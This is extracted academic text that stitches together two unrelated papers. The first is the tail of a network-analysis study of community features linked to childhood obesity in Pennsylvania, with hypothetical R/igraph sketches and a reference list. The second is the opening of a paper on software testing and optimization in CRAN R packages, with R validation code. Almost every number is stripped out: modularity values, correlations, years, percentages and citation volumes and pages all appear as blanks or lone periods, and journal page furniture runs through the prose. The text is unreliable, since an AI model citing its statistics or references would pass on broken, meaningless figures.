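the network structure statistics reported in the table (modularity and average network degree, overall and within strata of obesity burden) could be produced along the lines sketched below. this is illustrative only, reusing the steps and the hypothetical 'features' matrix and 'obesity_quartile' grouping from the earlier sketches rather than the study's actual data or code.

library(igraph)

network_summary <- function(x) {
  adj <- abs(cor(x, method = "spearman", use = "pairwise.complete.obs"))
  diag(adj) <- 0
  g  <- graph_from_adjacency_matrix(adj, mode = "undirected",
                                    weighted = TRUE, diag = FALSE)
  wt <- cluster_walktrap(g, weights = E(g)$weight)
  c(modularity     = modularity(g, membership(wt), weights = E(g)$weight),
    average_degree = mean(E(g)$weight))
}

# one column of summary statistics per obesity quartile, plus the overall network
by_quartile <- sapply(split(as.data.frame(features), obesity_quartile),
                      network_summary)
cbind(by_quartile, overall = network_summary(features))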
in the analysis stratified by prevalence of childhood obesi- ty, communities in the st and nd quartile (thinnest communities) show a higher modularity compared to communities in the rd and th quartile (heaviest communities) (modularity of . and . vs. . and . , respectively). this means that the modules of variables in thinner communities are either more clustered within each module or have weaker con- nections to variables in other modules, and that in the heaviest communities variables (nodes) exhibit a lower degree of clustering in modules (as can be seen in fig. ). for example, a comparison of the two panels in figure demonstrates that the crime-related cluster shown in green has fewer strong ties (shown by darker lines) to the center of the network in the thinner communities on the left panel compared to the heavier communities in the right panel. similarly, the average network degree is higher in the heaviest communities (degree = . ) compared with the thinnest communities (degree = . ), representing higher average correlation (i.e., stronger connections), between variables in communities with higher preva- lence of childhood obesity. figure shows the relationship between the degree centrality of each community feature (node) with the bivariate correlation of that feature with child- hood overweight and obesity prevalence (percent of kids above the th bmi percentile). each dot represents one of the community features. the correlation between the degree of each feature and its correlation with the prevalence of childhood obe- sity is positive (r = . ), indicating that more ‘central’ variables have a stronger association with the out- come. for example, fresh fruit and vegetable stands per square mile has a low correlation with community obesity, and can be seen in figure as a variable far from the center of the network and with only a few weak ties into the rest of the network. discussion we applied network methodology in order to describe linkages between community features associated with obesity. we used network analysis to characterize the obesogenic environment: instead of treating individual features of communities in isolation, this method hon- ors the interactions and spatial co-occurrence that make up this landscape of obesity risk. this work suggests that (i) there are identifiable clusters of environmental features; (ii) that the level of connectivity and structure of features in the network may be informative; and (iii) that features more highly associated with obesity are more likely to be central in the network of community features. three clusters were identified in the overall network: a cluster of crime-related variables that was weakly linked into the main network, and food and land use and physical activity clusters, respectively. in communities strati- fied by prevalence of childhood obesity, the structure and overall connectivity of the network appeared to differ by level of obesity. not only are the values of these attributes different in the heaviest and thinnest communities, but also the patterns of connections are different. we also found that centrality alone, as measured by degree, is correlated with obesity. obesity-related features are therefore more tightly geographically clustered. this may be evidence of synergy between features of the obesogenic environ- ment, of non-independent features of communities that join forces to shape obesity risk. 
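the node-level association described above, relating each feature's degree centrality to the strength of its bivariate correlation with childhood overweight and obesity, can be sketched as follows. the objects 'g', 'features', and the community-level 'pct_overweight' vector are the hypothetical stand-ins introduced in the earlier sketches, not the study's data.

library(igraph)

# weighted degree (strength) of each feature in the network
node_strength <- strength(g, weights = E(g)$weight)

# absolute spearman correlation of each feature with percent overweight/obese
obesity_cor <- apply(features, 2, function(x)
  abs(cor(x, pct_overweight, method = "spearman",
          use = "pairwise.complete.obs")))
obesity_cor <- obesity_cor[names(node_strength)]

# association between centrality and correlation with obesity, and a
# scatter plot analogous to the figure described above
cor(node_strength, obesity_cor)
plot(node_strength, obesity_cor,
     xlab = "degree centrality (strength)",
     ylab = "absolute correlation with percent overweight/obese")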
understanding and intervening on the drivers of the obesity epidemic is a challenge for obesity re- searchers and policy makers. obesity is complex and has multiple drivers at the individual, communi- ty, and state and national levels (huang et al., ). traditional methods such as regression models fail to account for interaction between multiple factors at multiple scales, the complexity and importance of contextual factors, and feedback loops and oth- er dynamic processes (hammond, ). although our work is preliminary, it suggests that systems ap- proaches to obesity may be useful for characterizing linkages among features of the environment. despite the recognition that environmental features of com- munities play a strong role in the obesity epidemic, network methods to characterize linkages between attributes of communities has been underutilized. the structure and strength of these linkages may provide evidence for geographic areas or types of clusters of features that would be most efficient for intervention. network methods, especially graphical methods, could be used to help set priorities for obesity-relat- ed interventions in communities. for example, food establishments exhibited both high centrality (as measured by degree) in our network and high cor- relation with childhood obesity (fig. ). using these network graphs (e.g., fig. ), we can narrow in on features such as these that may have far reaching effects, if intervened upon. this is consistent with the connections (insna) literature on ‘food swamps’ and ‘food deserts’ – but helps to prioritize interventions in this area because these features are more central. this could point to the effectiveness of intervening on such variables that are highly central in the network, and thus may have more far-reaching effects than intervention on less central variables. network methods may help identify such synergistic actors that could have large effects on obesity due to their connections to other variables. in particular, our work points toward possible inter- ventions regarding community-zoning policies. our network graphs show tight clusters of food-related (e.g., grocery and convenience stores, fast food and full-service restaurants) and land use (e.g., road block length, household density) features that are strongly correlated with obesity. restructuring the community environment may be a promising avenue for obesity prevention. considering communities to be complex systems where multiple interrelated phenomena act together to create an obesogenic environment, these methods also push us to con- sider intervening on not just the environmental fea- tures themselves, but also on the linkages between features. this is a new way to approach the obesity epidemic – by looking for factors that may be link- ing features, or that can be manipulated to disrupt harmful connections. for example, the crime-related cluster is more tightly linked to the network among communities with more childhood obesity. further research into the underlying causes of this linkage (and why it differs in communities stratified by child- hood obesity prevalence) may illuminate important drivers of the obesity epidemic. this work also has methodological implications for obesity research. future work should explore the mechanisms for how these clusters are associated with increased obesity prevalence, and whether inter- ventions on features in this network change the net- work structure itself. 
this future research should con- sider the relationships, or clustering, of these features. evaluating independent associations between any single feature and obesity rates would ignore the com- plex inter-relations this work has highlighted. other methods that acknowledge these clusters of features, such as latent variable methods (nau et al., ), may be more appropriate to honor the way that en- vironmental features cluster together and to uncover unobserved sources of the correlation observed in this network. we have data from a large and diverse geographic area that includes urban, rural, and suburban com- munities. however, this analysis is exploratory. we are not able to rule out the possibility that popula- tion density and development may be a common cause of many of the variables we selected. this is potentially a source of bias or a possible explana- tion for the clustering of features of the environment on which our study is based. it is widely recognized that obesity-related characteristics of communities are geographically correlated. the reasons for those correlations are not well understood. our results, we believe, support the utility of network methods for the study of environments that are not formed randomly, but which are shaped by diverse market and demo- graphic forces that may be important in driving spatial variation in obesity rates. conclusion network analysis may be a useful tool for evaluating obesogenic environments and other questions of interest in epidemiology. this preliminary analysis suggests that patterns of clustering and connections between features of the environment are important. land use and food features are strongly linked (espe- cially in ‘heavier’ communities), and features are more highly clustered in communities with higher average bmi. network methods can illuminate patterns of link- ages and key factors in obesogenic environments. network position (centrality) is correlated with aver- age bmi. ultimately, the goal of this type of analysis would be to identify highly connected community features that can be used as levers of intervention to reduce population rates of obesity. acknowledgements emily knapp was supported by the clinical research and epidemiology in diabetes and endocrinolo- gy training grant (t dk ). usama bilal was supported by a fellowship from the obra social la caixa and by a johns hopkins center for a livable future-lerner fellowship. bridget teevan burke was supported by the epidemiology and biostatistics of aging training grant (t ag ). data for this manuscript were collected as part of a project supported by grant number u hd from the eunice kennedy shriver national institute of child health and human development (nichd). the project is co-funded by the nichd and the office of behavioral and social sciences research (obssr). the content is solely the responsibility of the authors and does not necessarily represent the official views of the nichd or obssr. a network approach to understanding obesogenic environments for children in pennsylvania literature cited ali, m.m., amialchuk, a. and rizzo, j.a. . the in- fluence of body weight on social network ties among ad- olescents. economics and human biology ( ): – . ali, m.m., amialchuk, a., gao, s. and heiland, f. . adolescent weight gain and social networks: is there a contagion effect?. applied economics ( ): – . barabasi, a.l. . network medicine – from obesity to the ‘diseasome’. the new england journal of medicine ( ): – , doi: . /nejme . barabasi, a.l. . 
scale-free networks: a decade and beyond. science ( ): – . barabasi, a.l. . network science: luck or reason. nature ( ): – . barabasi, a.l. . network science. philo- sophical transactions of the royal society a mathe- matical physicla and engineering science ( ): . barrat, a., barthélemy, m., pastor-satorras, r. and vespignani, a. . the architecture of com- plex weighted networks. proceedings of the national academy of sciences of the united states of america ( ): – , doi: . /pnas. . berger, e., vega, n., vidal, h. and geloen, a. . gene network analysis leads to functional validation of pathways linked to cancer cell growth and survival. biotechnology journal ( ): – . blanchflower, d.g., landeghem, b. and oswald, a.j. . imitative obesity and relative utility. journal of the european economic association ( – ): – . brewis, a.a., hruschka, d.j. and wutich, a. . vulnerability to fat-stigma in women’s everyday rela- tionships. social science and medicine ( ): – . burke, m.a. and heiland, f. . social dynamics of obesity. economic inquiry ( ): – . chen, z. and zhang, w. . integrative analysis using module-guided random forests reveals corre- lated genetic factors related to mouse weight. plos computational biology ( ): e . christakis, n.a. and fowler, j.h. . the spread of obesity in a large social network over years. the new england journal of medicine ( ): – . crandall, c.s. . social contagion of binge eat- ing. journal of personality and social psychology ( ): – . csardi, g. and nepusz, t. . the igraph soft- ware package for complex network research. inter- journal complex systems , – . dallman, m.f., pecoraro, n., akana, s.f., la fleur, s.e., gomez, f., houshyar, h., bell, m.e., bhatnagar, s., laugero, k.d. and manalo, s. . chronic stress and obesity: a new view of ‘comfort food’. proceed- ings of natlional academy of science of the united states of america ( ): – . dallman, m.f., pecoraro, n.c., la fleur, s.e., warne, j.p., ginsberg, a.b., akana, s.f., laugero, k.c., houshyar, h., strack, a.m., bhatnagar, s. and bell, m.e. . glucocorticoids, chronic stress, and obesity. progress in brain research , – . de la haye, k., robins, g., mohr, p. and wilson, c. . homophily and contagion as explanations for weight similarities among adolescent friends. journal of adolescent health ( ): – . el-sayed, a.m., scarborough, p., seemann, l. and galea, s. . social network analysis and agent- based modeling in social epidemiology. epidemiologic perspectives and innovations ( ): . epskamp, s., cramer, a.o.j., waldorp, l.j., schmittmann, v.d. and borsboom, d. . qgraph: network visualizations of relationships in psychometric data. journal of statistical software ( ): – . finegood, d.t. . the complex systems science of obesity. in cawley, j. (ed.), the oxford handbook of social science of obesity, oxford university press, new york, – . fox, m.d., snyder, a.z., vincent, j.l., corbetta, m., van essen, d.c. and raichle, m.e. . the human brain is intrinsically organized into dynamic, anticorre- lated functional networks. proceedings of the national academy of sciences of the united states of america ( ): – , doi: . /pnas. . fruchterman, t.m.j. and reingold, e.m. . graph drawing by force-directed placement. software: practice and experience ( ): – , doi: . / spe. . galea, s., riddle, m. and kaplan, g.a. . causal thinking and complex system approaches in epide- miology. international journal of epidemiology ( ): – . gesell, s.b., tesdahl, e. and ruchman, e. . 
the distribution of physical activity in an after-school friendship network. pediatrics ( ): – , doi: . /peds. - . gill, r., datta, s. and datta, s. . differential network analysis in human cancer research. current pharmaceutical design ( ): – . goh, k.i., cusick, m.e., valle, d., childs, b., vidal, m. and barabasi, a.l. . the human disease net- work. proceedings of natlional academy of science of the united states of america ( ): – , doi: . /pnas. . hammond, r. . complex systems modeling for obesity research. preventing chronic disease ( ): – . connections (insna) hammond, r.a. . social influence and obesity. current opinion in endocrinology, diabetes and obe- sity ( ): – . hammond, r.a. and ornstein, j.t. . a model of social influence on body mass index. annals of the new york academy of science , – . hidalgo, c.a. and castañer, e.e. . the amenity space and the evolution of neighborhoods. arxiv: . [physics.soc-ph] hidalgo, c.a., blumm, n., barabasi, a.l. and chris- takis, n.a. . a dynamic network approach for the study of human phenotypes. plos computational biol- ogy ( ): e , doi: . /journal.pcbi. . hill, a.l., rand, d.g., nowak, m.a. and christakis, n.a. . infectious disease modeling of social con- tagion in networks. plos computational biology ( ): e . hill, j.o. and peters, j.c. . environmental con- tributions to the obesity epidemic. science ( ): – . huang, t.t., drewnosksi, a., kumanyika, s. and glass, t.a. . a systems-oriented multilevel frame- work for addressing obesity in the st century. pre- venting chronic disease ( ): a . jeong, h., mason, s.p., barabasi, a.l. and oltvai, z.n. . lethality and centrality in protein networks. nature ( ): – , doi: . / . leroux, j.s., moore, s. and dubé, l. . beyond the ‘i’ in the obesity epidemic: a review of social rela- tional and network interventions on obesity. journal of obesity , . mcglashan, j., johnstone, m., creighton, d., de la haye, k. and allender, s. . quantifying a sys- tems map: network analysis of a childhood obesity causal loop diagram. plos one ( ): e , doi: . /journal.pone. . marks, j., barnett, l.m., foulkes, c., hawe, p. and allender, s. . using social network analy- sis to identify key child care center staff for obesity prevention interventions: a pilot study. j obes , . mutation consequences and pathway analysis working group of the international cancer genome consortium . pathway and network analysis of cancer genomes. nature methods ( ): – . nau, c., ellis, h., huang, h., schwartz, b.s., hirsch, a., bailey-davis, l., kress, a.m., pollak, j. and glass, t.a. . exploring the forest instead of the trees: an innovative method for defining obesogenic and obeso- protective environments. health place , – , doi: . /j.healthplace. . . . newman, m.e.j. . modularity and community structure in networks. proceedings of the national academy of sciences of the united states of america ( ): – , doi: . /pnas. . pons, p. and latapy, m. . computing com- munities in large networks using random walks. in yolum, p., güngör, t., gürgen, f. and Özturan, c. (eds), computer and information sciences – iscis : proceedings of the th international symposium, istanbul, turkey, october – , springer, berlin, heidelberg, – . schwartz, b.s., stewart, w.f., godby, s., pollak, j., dewalle, j., larson, s., mercer, d.g. and glass, t.a. . body mass index and the built and social environments in children and adolescents using electronic health records. american journal of pre- ventive medicine ( ): e –e , doi: . /j.ame- pre. . . . 
simpkins, s.d., schaefer, d.r., price, c.d. and vest, a.e. . adolescent friendships, bmi, and physical activity: untangling selection and influence through longitudinal social network analysis. journal of research adolescence ( ): doi: . /j. - . . .x. stites, e.c., trampont, p.c., ma, z. and ravichan- dran, k.s. . network analysis of oncogenic ras activation in cancer. science ( ): – . swinburn, b., egger, g. and raza, f. . dissect- ing obesogenic environments: the development and application of a framework for identifying and prioritizing environmental interventions for obesity. preventive med- icine ( pt ): – , doi: . /pmed. . . zhang, b. and horvath, s. . a general frame- work for weighted gene co-expression network analy- sis. statistical applications in genetics and molecular biology epub . zhou, x., menche, j., barabasi, a.l. and sharma, a. . human symptoms-disease network. nature communication , , doi: . /ncomms . , network science software engineering principles to improve quality and performance of r software software engineering principles to improve quality and performance of r software seth russell , tellen d. bennett , and debashis ghosh , university of colorado data science to patient value, university of colorado anschutz medical campus, aurora, co, usa pediatric critical care, university of colorado school of medicine, aurora, co, usa department of biostatistics and informatics, colorado school of public health, aurora, co, usa abstract today’s computational researchers are expected to be highly proficient in using software to solve a wide range of problems ranging from processing large datasets to developing personalized treatment strategies from a growing range of options. researchers are well versed in their own field, but may lack formal training and appropriate mentorship in software engineering principles. two major themes not covered in most university coursework nor current literature are software testing and software optimization. through a survey of all currently available comprehensive r archive network packages, we show that reproducible and replicable software tests are frequently not available and that many packages do not appear to employ software performance and optimization tools and techniques. through use of examples from an existing r package, we demonstrate powerful testing and optimization techniques that can improve the quality of any researcher’s software. subjects computer education, data science, software engineering keywords unit testing, profiling, optimization, software engineering, r language, statistical computing, case study, reproducible research, data science introduction writing scientific software has progressed from the work of early pioneers to a range of computer professionals, computational researchers, and self-taught individuals. the educational discipline of computer science, standardized many years ago through recommendations from the association for computing machinery (acm) (atchison et al., ), has grown in breadth and depth over many years. software engineering, a discipline within computer science, “seeks to develop and use systematic models and reliable techniques to produce high-quality software. these software engineering concerns extend from theory and principles to development practices that are most visible to those outside the discipline” (the joint task force on computing curricula, ). 
as they gain sophistication, computational researchers, statisticians, and similar professionals need to advance their skills by adopting principles of software engineering. wilson et al. ( ) identified eight key areas where scientists can benefit from software engineering best practices. the term “best” as referenced in the previous cited work and others cited later refers to expert consensus based on knowledge and observational reporting of results from application of the practices. they provide a high-level description of eight important principles of software engineering that should how to cite this article russell s, bennett td, ghosh d. . software engineering principles to improve quality and performance of r software. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted january published february corresponding author seth russell, seth.russell@ucdenver.edu academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright russell et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:seth.�russell@�ucdenver.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ “reduce the number of errors in scientific software, make it easier to reuse, and save the authors of the software time and effort that can used for focusing on the underlying scientific questions.” while their principles are still relevant and important today, there has not been enough progress in this endeavor, especially with respect to software testing and software optimization principles (wilson, ; nolan & padilla-parra, ). the acm/institute of electrical and electronics engineers recommendations for an undergraduate degree in software engineering describe a range of coursework and learning objectives. their guidelines call out specific knowledge areas that should be part of or guide all software engineering coursework. the major areas are: computer science fundamentals, math and engineering fundamentals, professional interactions/ communication, software modeling, requirement gathering, software design, verification, project processes, quality, and security (the joint task force on computing curricula, ). these major themes are not covered extensively outside software engineering and include such generally applicable items such as software verification, validation, testing, and computer science fundamentals (for example, software optimization, modeling, and requirement gathering). in addition to the need for further training, understanding the software lifecycle is necessary: the process of software development from ideation to delivery of code. the largest component of software’s lifecycle is maintenance. software maintenance costs are large and increasing (glass, ; dehaghani & hajrahimi, ; koskinen, ); some put maintenance at % of total software cost. the chief factor in software maintenance cost is the time of the people creating and using the software. from the recent trend on making research results reproducible and replicable, some recommend making code openly available to any who might wish to repeat or further analyze results (leek & peng, ). with the development of any software artifact, an important consideration for implementation should be maintenance. 
as research scientists tend to think of their software products as unique tools that will not be used regularly or for a long period, they often do not consider long term maintenance issues during the development phase (sandve et al., ; prins et al., ). while a rigorous and formal software engineering approach is not well suited to the standard lifecycle of research software (wilson, ), there are many techniques that can help to reduce cost of maintenance and speed development. while best practices such as the use of version control software, open access to data, software, and results are becoming more wide spread, other practices such as testing and optimization need further attention. in this paper, a brief survey of currently available r packages from the comprehensive r archive network (cran) will be used to show the continued need for software testing and optimization. source code for this analysis is freely available at https://github.com/magic-lantern/softwareengineeringprinciples. after the presentation of the current state of r packages, general advice on software testing and optimization will be presented. the r package “pccc: pediatric complex chronic conditions” (feinstein et al., ; dewitt et al., ) (pccc), available via cran and at https://github.com/cud v/pccc, is used for code examples in this article. pccc is a combined r and c++ implementation of the pediatric complex chronic conditions russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/magic-lantern/softwareengineeringprinciples https://github.com/cud v/pccc http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ software released as part of a series of research papers (feudtner, christakis & connell, ; feudtner et al., ). pccc takes as input a data set containing international statistical classification of diseases and related health problems (icd) ninth revision or tenth revision diagnosis and procedure codes and outputs which if any complex chronic conditions a patient has. analysis of r packages on cran testing of r packages in order to estimate the level of testing common among r software, we analyzed all r packages available through cran. although nolan & padilla-parra ( ) performed a similar analysis in the past, due to the rapid change in the cran as a whole, a reevaluation is necessary. at the time of nolan’s work, cran contained , packages; it now contains , . furthermore, the analysis by nolan had a few shortcomings that we have addressed in this analysis: there are additional testing frameworks for which we wanted to analyze their usage; not all testing frameworks and r packages store their test code in a directory named “tests”; only packages modified in the past years were reported—there are many commonly used r packages that have not been updated in the last years. although we address some shortcomings in analyzing r code for use of testing best practices, our choice of domain for analysis does have some limitations. not all research software is written in r; for those that do use r, not all software development results in a package published on cran. while other software languages have tools for testing, additional research would be needed to evaluate level of testing in those languages to see how it compares to this analysis. although care has been taken to identify standard testing use cases and practices for r, testing can be performed in-line through use of core functions such as stop() or stopifnot(). 
also, developers may have their own test cases they run while developing their software, but did not include them in the package made available on cran. unit tests can be considered executable documentation, a key method of conveying how to use software correctly (reese, ). published research that involves software is not as easy to access and evaluate for use of testing code as cran packages are. while some journals have standardized means for storing and sharing code, many leave the storing and sharing of code up to the individual author, creating an environment where code analysis would require significant manual effort. to analyze use of software testing techniques, we evaluated all cran packages on two different metrics: metric : in the source code of each package, search for non-empty testing directories using the regular expression pattern “[tt]est[̂/]�/.+”. all commonly used r testing packages (those identified for metric ) recommend placing tests in a directory by themselves, which we look for. metric : check for stated dependencies on one of the following testing packages: runit (burger, juenemann & koenig, ), svunit (grosjean, ), testit (xie, ), testthat (wickham, ), unitizer (gaslam, ), or unittest russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (lentin & hennessey, ). from the authors of these packages, it is recommended to list dependency (or dependencies) to a testing framework even though standard usage of a package may not require it. for the testing analysis, we used as the cutoff year for visualizations due to the low number of packages last updated prior to . as shown in fig. , the evaluation for the presence of a non-empty testing directory shows that there is an increasing trend in testing r packages, with % of packages updated in having some tests. table s contains the data used to generate fig. . as shown in fig. , reliance upon testing frameworks is increasing over time both in count and as a percentage of all packages. there packages that list dependencies on more than one testing framework (nine with dependencies on both runit and testthat, seven with dependencies on both testit and testthat), so the total number of packages shown in the histogram includes that are double counted. table s contains the data used to generate fig. . as the numbers from metric do not match the numbers of metric , some additional exploration is necessary. there are more packages identified from metric vs metric . there are , packages that do not list a dependency to a testing framework, but have a testing directory; for example, the package xlsx (dragulescu & arendt, ). some packages use a testing framework, but do not list it as a dependency; for example, the package redcapapi (nutter & lane, ). there are also packages that list a testing framework as a dependency, but do not contain a directory with tests. see tables s and s for more details. figure packages with non-empty testing directory. count of packages with files in standard testing directories by year a package was last updated. testing directory “yes” is determined by the presence of files matching the regular expression “[tt]est[̂/]�/.+”; if no matches are found for an r package, it is counted as a “no”. full-size doi: . /peerj-cs. /fig- russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. 
/supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ optimization of r packages in order to estimate the level of software optimization common among r software, we performed an analysis of all r packages available through cran. to analyze the use of software optimization tools and techniques, we evaluated all cran packages on two different metrics: metric : in the source code of each package, search for non-empty src directories using the regular expression pattern “src[̂/]�/.+”. by convention, packages using compiled code (c, c++, fortran) place those files in a “/src” directory. metric : check for stated dependencies on packages that can optimize, scale performance, or evaluate performance of a package. packages included in analysis are: dsl (feinerer, theussl & buchta, ), rcpp (eddelbuettel & balamuta, ), rcppparallel (allaire et al., a), rmpi (yu, ), sparkr (apache software foundation, ), batchtools (bischl et al., ), bench (hester, ), benchr (klevtsov, antonov & upravitelev, ), domc (calaway, analytics & weston, ), dompi (weston, ), doparallel (calaway et al., ), dosnow (calaway, corporation & weston, ), foreach (calaway, microsoft & weston, ), future (bengtsson, ), future.apply (bengtsson & r core team, ), microbenchmark (mersmann, ), parallel (r core team, ), paralleldist (eckert, ), parallelmap (bischl & lang, ), partools (matloff, ), profr (wickham, a), profvis (chang & luraschi, ), rbenchmark (kusnierczyk, eddelbuettel & hasselman, ), snow (tierney et al., ), sparklyr (luraschi et al., ), tictoc (izrailev, ). figure packages with testing framework dependency. count of dependencies on a testing package (runit, svunit, testit, testthat, unitizer, unittest) by year a package was last updated. packages with no stated dependency from their description file for one of the specified packages are listed as “none”. full-size doi: . /peerj-cs. /fig- russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for the optimization analysis, we used as the cutoff year for visualizations showing presence of a src directory due to the low number of currently available packages last updated prior to . for optimization related dependencies, in order to aid visual understanding, we used as the cutoff year and only showed those packages with or greater dependent packages in a given year. automatically analyzing software for evidence of optimization has similar difficulties to those mentioned previously related to automatically detecting the use of software testing techniques and tools. the best evidence of software optimization would be in the history of commits, unit tests that time functionality, and package bug reports. while all r packages have source code available, not all have development history available nor unit tests available. additionally, a stated dependency on one of the optimization packages listed could mean the package creators recommend using that along with their package, not that they are actually using it in their package. despite these shortcomings, it is estimated that presence of a src directory or the use of specific packages is an indication that some optimization effort was put into a package. as shown in fig. , the evaluation for the presence of a non-empty src directory shows that there is an increasing trend in using compiled code in r packages, by count. 
however, when evaluated as a percent of all r packages, the change has only been a slight increase over the last few years. table s contains the data used to generate fig. . as shown in fig. , in , rcpp is the most common optimization related dependency followed by parallel and foreach. those same packages have been the most popular for packages last updated during the entire period shown. there packages that list figure packages with non-empty src directory. count of packages with files in standard source directories that has code to be compiled by year a package was last updated. compiled directory “yes” is determined by the presence of files matching the regular expression “src[̂/]�/.+”; if no matches are found for an r package, it is counted as a “no”. full-size doi: . /peerj-cs. /fig- russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dependencies to more than one optimization framework ( with dependencies, w/ , w/ , w/ , w/ , w/ ), so the total number of packages shown in the histogram includes some that are double-counted. table s contains the data used to generate fig. . as the numbers from metric do not match the numbers of metric , some additional exploration is necessary. in terms of total difference, there are more packages using compiled code vs those with one of the searched for dependencies. there are , packages that do not list a dependency to one of the specified packages, but have a src directory for compiled code. there are packages that list a dependency to one of the specified packages but do not have a src directory. see tables s and s for more details. recommendations to improve quality and performance software testing whenever software is written as part of a research project, careful consideration should be given to how to verify that the software performs the desired functionality and produces the desired output. as with bench science, software can often have unexpected and unintended results due to minor or even major problems during the implementation process. software testing is a well-established component of any software development lifecycle (atchison et al., ) and should also be a key component of research software. as shown previously, even among r software packages intended to be shared figure packages with optimization framework dependency. count of dependencies on an optimi- zation related package, see “optimization of r packages” section for complete list, by year a package was last updated. packages with no stated dependency from their description file for one of the specified packages are listed as “none.” in order to aid visual understanding of top dependencies, we limited display to those packages that had or more dependent packages.full-size doi: . /peerj-cs. /fig- russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ with and used by others, the majority of r packages ( – % depending on metric) do not have tests that are made available with the package. various methodologies and strategies exist for software testing and validation as well as how to integrate software with a software development lifecycle. 
some common testing strategies are no strategy, ad hoc testing (agruss & johnson, ), test driven development (tdd) (beck & gamma, ). there are also common project methodologies where testing fits into the project lifecycle; two common examples are the waterfall project management methodology, where testing is a major phase that occurs at a specific point in time, and the agile project management methodology (beck et al., ), where there are many small iterations including testing. while a full discussion of various methods and strategies is beyond the scope of this article, three key concepts presented are: when to start testing, what to test, and how to test. key recommendations for when to test: � build tests before implementation. � test after functionality has been implemented. discussion: one of the popular movements in recent years has been to develop tests first and then implement code to meet desired functionality, a strategy called tdd. while the tdd strategy has done much to improve the focus of the software engineering world on testing, some have found that it does not work with all development styles (hansson, ; sommerville, ), and others have reported that it does not increase developer productivity, reduce overall testing effort, nor improve code quality in comparison to other testing methodologies (fucci et al., ). an approach that more closely matches the theoretically based software development cycle and flexible nature of research software is to create tests after a requirement or feature has been implemented (osborne et al., ; kanewala & bieman, ). as developing comprehensive tests of software functionality can be a large burden to accrue at a single point in time, a more pragmatic approach is to alternate between developing new functionality and designing tests to validate new functionality. similar to the agile software development strategy, a build/test cycle can allow for quick cycles of validated functionality that help to provide input into additional phases of the software lifecycle. key recommendations for what to test: � identify the most important or unique feature(s) of software being implemented. software bugs are found to follow a pareto or zipfian distribution. � test data and software configuration. � if performance is a key feature, build tests to evaluate performance. discussion: in an ideal world, any software developed would be accompanied by % test coverage validating all lines of code, all aspects of functionality, all input, and all interaction with other software. however, due to pressures of research, having time to build a perfect test suite is not realistic. a parsimonious application of the pareto principle russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ will go a long way towards improving overall software quality without adding to the testing burden. large companies such as microsoft have applied traditional scientific methods to the study of bugs and found that the pareto principle matches reality: % of bugs cause % of problems; additionally a zipfian distribution may apply as well: % of bugs cause % of all problems (rooney, ). to apply the pareto principle to testing, spend some time in a thought experiment to determine answers to questions such as: what is the most important feature(s) of this software? if this software breaks, what is the most likely bad outcome? for computationally intensive components—how long should this take to run? 
once answers to these questions are known, the developer(s) should spend time designing tests to validate key features, avoiding major negatives, and ensuring software performs adequately. optimization and performance recommendations are covered in the “software optimization” section. part of the test design process should include how to “test” more than just the code. some specific aspects of non-code tests include validation of approach and implementation choices with a mentor or colleague. as a brief example of how to apply the aforementioned testing principles, we provide some information on testing steps followed during the pccc package development process. the first tests written were those that were manually developed and manually run as development progressed. key test cases of this form are ideal candidates for inclusion in automated testing. the first tests were taking a known data set, running our process to identify how many of the input rows had complex chronic conditions, and then report on the total percentages found; this result was then compared with published values. # read in hcup kid database kid cols <- read_csv(“kid _core_columns.csv”) kid core <- read_fwf(“kid_ _core.asc”, fwf_positions( start = kid cols$start, end = kid cols$end, col_names = tolower(kid cols$name)), col_types = paste(rep(“c”, nrow(kid cols)), collapse = “”)) # output some summary information for manual inspection table(kid core$year) dim(kid core) n_distinct(kid core$recnum) # run process to identify complex chronic conditions kid_ccc <- ccc(kid core[, c( , : , : , : )], id = recnum, dx_cols = vars(starts_with(“dx”), starts_with(“ecode”)), russell et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ pc_cols = vars(starts_with(“pr”)), icdv = ) # output results for manual inspection kid_ccc # create summary statistics to compare to published values dplyr::summarize_at(kid_ccc, vars(-recnum), sum) %>% print.data.frame dplyr::summarize_at(kid_ccc, vars(-recnum), mean) %>% print.data.frame for the pccc package there is a large set of icd codes and code set patterns that are used to determine if an input record meets any complex chronic condition criteria. to validate the correct functioning of the software, we needed to validate the icd code groupings were correct and were mutually exclusive (as appropriate). as pccc is a re-implementation of existing sas and stata code, we needed to validate that the codes from the previously developed and published software applications were identical and were performing as expected. through a combination of manual review and automated comparison codes were checked to see if duplicates and overlaps existed. any software dealing with input validation or having a large amount of built-in values used for key functionality should follow a similar data validation process. as an example of configuration testing, here is a brief snippet of some of the code used to automatically find duplicates and codes that were already included as part of another code: icds <- input.file(“../pccc_validation/icd _codes_r.txt”) unlist(lapply(icds, function(i) { tmp <- icds[icds != i] output <- tmp[grepl(paste (“̂”, i, “.�”), 